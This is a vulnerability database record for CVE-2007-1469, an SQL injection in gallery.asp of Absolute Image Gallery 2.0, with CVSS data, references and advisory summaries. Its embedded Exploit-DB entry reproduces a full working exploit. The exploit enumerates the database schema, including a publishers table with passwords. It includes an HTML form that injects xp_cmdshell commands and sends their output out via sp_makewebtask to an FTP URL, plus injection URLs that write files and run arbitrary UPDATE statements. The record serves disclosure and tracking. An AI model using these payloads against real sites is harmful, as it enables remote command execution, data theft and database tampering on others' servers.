ID CVE-2007-1469Type cveReporter cve@mitre.orgModified 2018-10-16T16:38:00
Description
SQL injection vulnerability in gallery.asp in Absolute Image Gallery 2.0 allows remote attackers to execute arbitrary SQL commands via the categoryid parameter in a viewimage action.
{"id": "CVE-2007-1469", "bulletinFamily": "NVD", "title": "CVE-2007-1469", "description": "SQL injection vulnerability in gallery.asp in Absolute Image Gallery 2.0 allows remote attackers to execute arbitrary SQL commands via the categoryid parameter in a viewimage action.", "published": "2007-03-16T21:19:00", "modified": "2018-10-16T16:38:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1469", "reporter": "cve@mitre.org", "references": ["http://www.vupen.com/english/advisories/2007/1002", "http://secunia.com/advisories/24543", "https://exchange.xforce.ibmcloud.com/vulnerabilities/33005", "http://www.securityfocus.com/bid/22988", "http://www.osvdb.org/34239", "http://www.securityfocus.com/archive/1/462971/100/0/threaded", "http://securityreason.com/securityalert/2429"], "cvelist": ["CVE-2007-1469"], "type": "cve", "lastseen": "2019-05-29T18:08:59", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "6821fd3615deab5761ebaf06f2097774"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "c4ab5c05eade79a3c906d69cd0dce510"}, {"key": "cpe23", "hash": "ad8a0789838f50b700bb213513b18ff8"}, {"key": "cvelist", "hash": "36de31b6dbc510a6d69db6bbe83891a0"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "4994f73f97fee1825d38aac7bee9aefe"}, {"key": "description", "hash": "893706d32a41ef2f31fca44003773689"}, {"key": "href", "hash": "7b5d640c1240cf6e48ba7404519cea7e"}, {"key": "modified", "hash": "be8c6cba32d3ed9bd262b9f8d55a0549"}, {"key": "published", "hash": "ed43eaf31f28fbaab369730a7ab3fa6d"}, {"key": "references", "hash": "5dd235b0925c0ec7ab8fe1fd9dd53caf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "be4b1bd27dc090f19939773a4caafdb1"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "0f12ed9f70be054b2422bad98c906c0790829498ac3f501a2cd1a2b717136806", "viewCount": 0, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2019-05-29T18:08:59"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:3493"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7412"]}, {"type": "osvdb", "idList": ["OSVDB:34239"]}], "modified": "2019-05-29T18:08:59"}, "vulnersScore": 7.4}, "objectVersion": "1.3", "cpe": ["cpe:/a:xigla:absolute_image_gallery_xe:2.0"], "affectedSoftware": [{"name": "xigla absolute_image_gallery_xe", "operator": "eq", "version": "2.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:xigla:absolute_image_gallery_xe:2.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"]}
{"osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nAbsolute Image Gallery contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'gallery.asp' script not properly sanitizing user-supplied input to the 'categoryid' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nAbsolute Image Gallery contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'gallery.asp' script not properly sanitizing user-supplied input to the 'categoryid' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## References:\n[Secunia Advisory ID:24543](https://secuniaresearch.flexerasoftware.com/advisories/24543/)\nOther Advisory URL: http://milw0rm.com/exploits/3493\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0203.html\nISS X-Force ID: 33005\nFrSIRT Advisory: ADV-2007-1002\n[CVE-2007-1469](https://vulners.com/cve/CVE-2007-1469)\nBugtraq ID: 22988\n", "modified": "2007-03-15T11:03:50", "published": "2007-03-15T11:03:50", "href": "https://vulners.com/osvdb/OSVDB:34239", "id": "OSVDB:34239", "title": "Absolute Image Gallery XE gallery.asp categoryid Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-03-16T00:00:00", "published": "2007-03-16T00:00:00", "id": "SECURITYVULNS:VULN:7412", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7412", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:36:53", "bulletinFamily": "exploit", "description": "Absolute Image Gallery 2.0 (gallery.asp categoryid) SQL Injection Vuln. CVE-2007-1469. Webapps exploit for asp platform", "modified": "2007-03-15T00:00:00", "published": "2007-03-15T00:00:00", "id": "EDB-ID:3493", "href": "https://www.exploit-db.com/exploits/3493/", "type": "exploitdb", "title": "Absolute Image Gallery 2.0 - gallery.asp categoryid SQL Injection Vuln", "sourceData": "Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit\r\n\r\nType :\r\n\r\nSQL Injection\r\n\r\nRelease Date :\r\n\r\n{2007-03-15}\r\n\r\nProduct / Vendor :\r\n\r\nAbsolute Image Gallery\r\n\r\nhttp://www.xigla.com/absoluteig/\r\n\r\nBug :\r\n\r\nhttp://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nScript Table/Colon Name : \r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : articlefiles\r\n\r\nfileid\r\nfiletitle\r\nfilename\r\narticleid\r\nfiletype\r\nfilecomment\r\nurlfile\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : articles\r\n\r\narticleid\r\nposted\r\nlastupdate\r\nheadline\r\nheadlinedate\r\nstartdate\r\nenddate\r\nsource\r\nsummary\r\narticleurl\r\narticle\r\nstatus\r\nautoformat\r\npublisherid\r\nclicks\r\neditor\r\nrelatedid\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : iArticlesZones\r\n\r\narticleid\r\nzoneid\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : plugins\r\n\r\npluginid\r\npplname\r\npplfile\r\nppldescription\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : PPL1reviews\r\n\r\nreviewid\r\narticleid\r\nname\r\nreviewdate\r\nreview\r\ncomments\r\nisannonymous\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : publishers\r\n\r\npublisherid\r\nname\r\nusername\r\npassword\r\nemail\r\nadditional\r\nplevel\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : publisherszones\r\n\r\npublisherid\r\nzoneid\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : xlaAIGcategories\r\n\r\ncategoryid\r\ncatname\r\ncatdesc\r\nsupercatid\r\nlastupdate\r\ncatpath\r\nimages\r\nallowupload\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : xlaAIGimages\r\n\r\nimageid\r\nimagename\r\nimagedesc\r\nimagefile\r\nimagedate\r\nimagesize\r\ntotalrating\r\ntotalreviews\r\nhits\r\ncategoryid\r\nstatus\r\nuploadedby\r\nadditionalinfo\r\nembedhtml\r\nkeywords\r\ncopyright\r\ncredit\r\nsource\r\ndatecreated\r\nemail\r\ninfourl\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : xlaAIGpostcards\r\n\r\ndateposted\r\npostcardid\r\nimageid\r\nbgcolor\r\nbordercolor\r\nfonttype\r\nfontcolor\r\nrecipientname\r\nrecipientemail\r\ngreeting\r\nbgsound\r\nsendername\r\nsenderemail\r\nsendermsg\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTable Name : zones\r\n\r\nzonename\r\ndescription\r\ntemplate\r\narticlespz\r\nzonefont\r\nfontsize\r\nfontcolor\r\nshowsource\r\nshowsummary\r\nshowdates\r\nshowtn\r\ntextalign\r\ndisplayhoriz\r\ncellcolor\r\ntargetframe\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nMSSQL CMD Injection Exploit(For DBO Users) :\r\n\r\n<title>Absolute Image Gallery MSSQL CMD Injection Exploit</title>\r\n<body bgcolor=\"#000000\">\r\n<form name=\"Form\" method=\"get\" action=\"http://localhost/script/gallery.asp\">\r\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>Absolute Image Gallery MSSQL CMD Injection Exploit</b></font><br><br></center>\r\n<center><font face=\"Verdana\" size=\"1\" color=\"#00FF00\"><b>Note : For DBO Users</b></font><br><br></center>\r\n<center><font face=\"Verdana\" size=\"1\" color=\"#00FF00\"><b>Example :</b></font><br><br></center>\r\n <tr>\r\n <center><img src=\"http://img382.imageshack.us/img382/7867/dirav8.jpg\"></center><br>\r\n <center><td align=\"right\"><font face=\"Arial\" size=\"1\" color=\"#00FF00\">Command Exec :</td>\r\n <td>\u00a0</td>\r\n <td><input name=\"action=viewimage&categoryid=-1\" type=\"text\" value=\";exec master..xp_cmdshell 'dir c:\\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--\" class=\"inputbox\" style=\"color: #000000\" style=\"width:300px; \"></td>\r\n </tr>\r\n <tr>\r\n <td align=\"right\"><font face=\"Arial\" size=\"1\" color=\"#00FF00\">Search Board</td>\r\n <td>\u00a0</td>\r\n <td>\r\n <select name=\"\">\r\n <option value=\"0\">(CMD)</option>\r\n </select>\u00a0<br><br>\r\n <input type=\"submit\" value=\"Apply\"></center>\r\n </td>\r\n </tr>\r\n</table>\r\n</form>\r\n<center><font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE-Key{UniquE-Cracker}</b></font>\r\n<br>\r\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>UniquE@UniquE-Key.ORG</b></font>\r\n<br>\r\n<font face=\"Verdana\" size=\"2\" color=\"#FF0000\"><b>http://UniquE-Key.ORG</b></font></center>\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nCode Injection(For DBO Users) :\r\n\r\nAdd Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Create+table+code+(txt+varchar(8000),id+int);--\r\n\r\nASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F373737287478742C6964292076616C7565732827272C3129+exec(@q);--\r\n\r\nCode Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;declare+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id+=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripting.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+out,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;--\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nUPDATE(ALL users) :\r\n\r\nhttp://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';--\r\n\r\n---------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nTested :\r\n\r\nAbsolute Image Gallery 2.0\r\n\r\nVulnerable :\r\n\r\nAbsolute Image Gallery 2.0\r\n\r\nAuthor :\r\n\r\nUniquE-Key{UniquE-Cracker}\r\nUniquE(at)UniquE-Key.Org\r\nhttp://www.UniquE-Key.Org\r\n\r\n# milw0rm.com [2007-03-15]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3493/"}]}
